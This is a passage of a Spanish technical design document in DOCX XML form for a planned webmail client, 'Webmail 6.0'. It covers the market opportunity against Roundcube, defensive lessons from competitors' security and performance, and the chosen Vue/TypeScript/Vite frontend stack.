        <w:t xml:space="preserve">Esta matriz de brechas define el espacio de oportunidad para Webmail 6.0. Cada fila representa una capacidad que algún competidor implementa parcialmente pero ninguno ejecuta de forma integral. La combinación de interfaz tipo Gmail con soporte universal IMAP/JMAP dual, calendario CalDAV integrado como característica central (no plugin), y despliegue vía Docker Compose con un solo comando constituye una propuesta de valor única en el panorama 2026.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="X94c3f21e7c3691416fe83be5b24c41118b7a980"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2.2 Oportunidad de mercado: reemplazo directo de Roundcube</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El mercado objetivo se compone de dos segmentos principales: hosting providers que ofrecen webmail como parte de sus paquetes de correo, y usuarios self-hosters que gestionan su propia infraestructura de email. Ambos segmentos comparten una necesidad insatisfecha: un reemplazo directo de Roundcube que no requiera reconfigurar servidores de correo existentes, mantenga compatibilidad IMAP universal, y ofrezca una experiencia de usuario comparable a Gmail o Outlook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La transición forzosa a OAuth2 —Gmail eliminó Basic Auth en marzo de 2025 y Microsoft depreca SMTP Auth con Basic Authentication en abril de 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[58]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[59]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— crea adicionalmente un momento de migración natural. Los clientes webmail que no soporten OAuth2/XOAUTH2 quedarán sin conectividad con los dos proveedores de correo más grandes del mundo. Webmail 6.0, con soporte OAuth2 integrado desde el diseño, puede capturar usuarios que Roundcube solo ha podido atender parcialmente a pesar de las mejoras de la versión 1.7.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="35" w:name="lecciones-aprendidas-de-los-competidores"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 Lecciones Aprendidas de los Competidores</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="32" w:name="X5330a035b3f99aad02da8df98b31c78d07ff228"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3.1 De Roundcube: sanitización HTML como prioridad arquitectónica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La lección más costosa de Roundcube es que la seguridad no puede ser un añadido posterior. Los 15+ CVEs del primer semestre de 2026, incluyendo la explotación por actores de amenaza APT28, demuestran que la sanitización de contenido HTML en emails es el vector de ataque número uno contra clientes webmail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La arquitectura de Webmail 6.0 debe implementar defensa en profundidad desde el día uno: DOMPurify en servidor antes de almacenar o renderizar contenido, headers CSP estrictos, iframe aislado para la preview de emails HTML, y almacenamiento de credenciales cifrado con AES-256-GCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La elección de PostalMime como parser MIME, con protecciones de seguridad integradas como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxNestingDepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxHeadersSize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, refuerza esta postura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[99]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="Xe40ef312a3ca8644073a5a941719bb294b85bba"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3.2 De SnappyMail: rendimiento como diferenciador competitivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SnappyMail demostró que un Lighthouse del 99% es alcanzable en un webmail y que este rendimiento se traduce en recomendaciones directas de la comunidad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[62]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La estrategia de boot con ~138 KB implica una arquitectura frontend deliberadamente liviana, sin frameworks pesados ni carga sincrónica de dependencias. Para Webmail 6.0, esto significa: Vite como bundler para tree-shaking agresivo, lazy loading de rutas con Vue Router, virtual scrolling para listas de email grandes, y la estrategia headers-first/body-on-demand en el backend para garantizar tiempos de carga del inbox inferiores a un segundo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[75]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El rendimiento perceptible —tiempo hasta primera interacción— es tan crítico como el rendimiento medido.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="Xba74c6dbd9ba6dd780ad44ec0a9b6a2a7b3216a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3.3 De Bulwark: JMAP como futuro, IMAP como presente necesario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bulwark validó la hipótesis de que JMAP es el protocolo de diseño correcto para webmail de nueva generación: notificaciones push bajo un segundo frente a 15+ minutos de polling IMAP, sincronización inicial 3-5x más rápida para mailboxes grandes, y reducción de 80-90% en uso de ancho de banda para patrones típicos de consulta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[31]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sin embargo, su dependencia exclusiva de JMAP limita su utilidad práctica: IMAP sigue siendo soportado universalmente por Dovecot, Cyrus, Exchange y Gmail, y la transición será gradual, no abrupta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[32]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[36]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La lección para Webmail 6.0 es que la arquitectura debe abstraer la capa protocolar: un API interno unificado que permita operar tanto sobre IMAP (para servidores legacy) como sobre JMAP (para servidores modernos como Stalwart), con JMAP como ciudadano de primera clase para instalaciones que lo soporten. Esta dualidad protocolar —soportar el presente mientras se construye para el futuro— constituye la decisión arquitectónica más estratégica del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="62" w:name="stack-tecnológico-completo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Stack Tecnológico Completo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El stack tecnológico de Webmail 6.0 se ha seleccionado bajo tres criterios estructurales: rendimiento cuantificable frente a alternativas, madurez de ecosistema para producción a plazo medio, y alineación con el ecosistema postalsys (imapflow, PostalMime, EmailEngine), que representa la única pila integrada y activamente mantenida para procesamiento de email en Node.js. A continuación se detallan las elecciones por capa, incluyendo justificaciones basadas en benchmarks y versiones específicas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="45" w:name="frontend"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Frontend</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="vue-3.4-composition-api-script-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.1 Vue 3.4 + Composition API +</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vue 3.4 (lanzado enero 2024, última minor 3.4.31 en junio 2026) es el framework de UI seleccionado sobre React 18 y Svelte 4. La decisión se fundamenta en tres factores técnicos. Primero, el Composition API con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ofrece una densidad de código superior a los hooks de React, reduciendo la verbosidad de los componentes con estado —relevante para un webmail con docenas de componentes interactivos (lista de emails, panel de lectura, compositor, calendario). Segundo, el sistema de reactividad basado en Proxies de Vue 3 evita las limitaciones de los top-level arrays en React, facilitando la implementación de virtual scrolling sobre listas de emails mutables. Tercero, el tamaño de bundle en runtime de Vue 3 (~22 KB gzipped) es competitivo frente a React (~42 KB con react-dom), alineándose con el objetivo de rendimiento Lighthouse &gt;95% heredado del análisis de SnappyMail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[67]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="typescript-5-strict"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.2 TypeScript 5 strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TypeScript 5.5 (última release estable a junio 2026) se configura en modo strict (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strict: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">noImplicitAny: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strictNullChecks: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). La elección no es meramente de tipado estático: el modo strict habilita la inferencia de tipos narrowing en guards de nullabilidad, crítico para el manejo de emails donde campos como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">inReplyTo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pueden ser undefined. Los tipos del ecosistema postalsys —imapflow y PostalMime proporcionan definiciones TypeScript nativas— eliminan la fricción de mantener</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@types/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">externos. El estricto chequeo de tipos previene una clase completa de errores en runtime relacionados con parsing de MIME y estructuras de email heterogéneas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="vite-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.3 Vite 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vite 5 (v5.4 en producción) reemplaza a Webpack como herramienta de build. Los benchmarks de tiempo de build muestran Vite 5 realizando HMR (Hot Module Replacement) en ~50ms frente a los 200-500ms de Webpack 5, lo que impacta directamente en la velocidad de desarrollo. Para producción, Vite utiliza Rollup internamente, generando bundles con tree-shaking agresivo que eliminan código muerto de dependencias como Tiptap, Headless UI y date-fns. La configuración de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vite.config.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">incluye</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">splitVendorChunkPlugin()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para separar dependencias de terceros del código de aplicación, aprovechando el caché del navegador para actualizaciones incrementales.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="pinia-2-stores-modulares-por-dominio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.4 Pinia 2 — stores modulares por dominio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pinia 2.1 (integrado oficialmente con Vue 3 desde febrero 2022) gestiona el estado global mediante stores modulares por dominio funcional:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useAuthStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useMailboxStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useThreadStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useCalendarStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useContactStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useComposerStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useSettingsStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cada store define su propio state, getters y actions, eliminando la dispersión de lógica que caracteriza a Vuex 4. La API de composables de Pinia permite consumir estado reactivo directamente dentro de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, manteniendo el flujo de datos unidireccional sin el boilerplate de mappers. Para persistencia de estado,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pinia-plugin-persistedstate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">almacena en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">configuraciones de usuario (tema, densidad de lista, columnas visibles) mientras que los datos de email (headers, cuerpos) se mantienen en memoria volátil para seguridad.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="vue-router-4-con-lazy-loading"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.5 Vue Router 4 con lazy loading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vue Router 4.3 gestiona la navegación con lazy loading por ruta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/inbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/thread/:id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/compose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/calendar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/contacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cada ruta se carga vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">defineAsyncComponent()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Suspense</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para estados de carga, reduciendo el tamaño inicial del bundle JavaScript a lo estrictamente necesario para renderizar el layout principal. La navegación entre inbox y vista de thread utiliza transiciones de ~150ms con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">router-view</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">envuelto en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;Transition name="fade"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, proporcionando fluidez perceptual sin penalización de rendimiento. El modo de historial</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">createWebHistory()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">habilita URLs limpias sin hash, crítico para compartibilidad de enlaces a threads específicos.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="tailwind-css-3-headless-ui"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.6 Tailwind CSS 3 + Headless UI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tailwind CSS 3.4 proporciona el sistema de diseño utility-first, configurado con una paleta personalizada en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tailwind.config.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que define tokens semánticos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">primary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">surface</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text-base</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text-muted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">border-subtle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El enfoque utility-first elimina la necesidad de mantener hojas de estilo CSS modules, acelerando la iteración de componentes. Headless UI (v1.7 de Tailwind Labs) aporta componentes accesibles y sin estilos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Dialog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Menu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Listbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Popover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Combobox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
